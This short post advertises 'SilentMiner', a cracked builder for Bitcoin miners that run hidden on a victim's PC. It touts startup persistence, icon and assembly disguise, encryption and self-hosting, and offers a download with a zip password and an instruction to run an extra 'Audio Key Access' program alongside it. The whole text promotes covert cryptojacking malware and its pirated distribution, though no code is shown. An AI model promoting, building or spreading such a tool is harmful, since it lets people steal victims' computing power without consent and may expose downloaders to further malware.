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Silent Miner [BitCoin Miner] Private by darktheatre

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SilentMiner is a silent BitCoin miner that runs hiddenly. You can set the parameters to each miner, each miner that you create will be unique. Do you want it to run at full speed or do you want it to run at the minimal speed? Just run the bin on the PC and everything will be done for you.

With the purchase of SilentMiner you get the builder which allows you create unlimited miners. The builder allows you to customize each bin with whatever settings you desire. Settings such as GPU intensity, CPU cores, assembly/icon modifier, start up, encryption key. If you don't want us to host the files you can host them yourself, using self host!
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released april 2013
DOWNLOAD SILENT MINER  cracked by darktheatre

Password zip :
How to use : Run "Audio Key Access" before and while programing is running .. (anti leech system)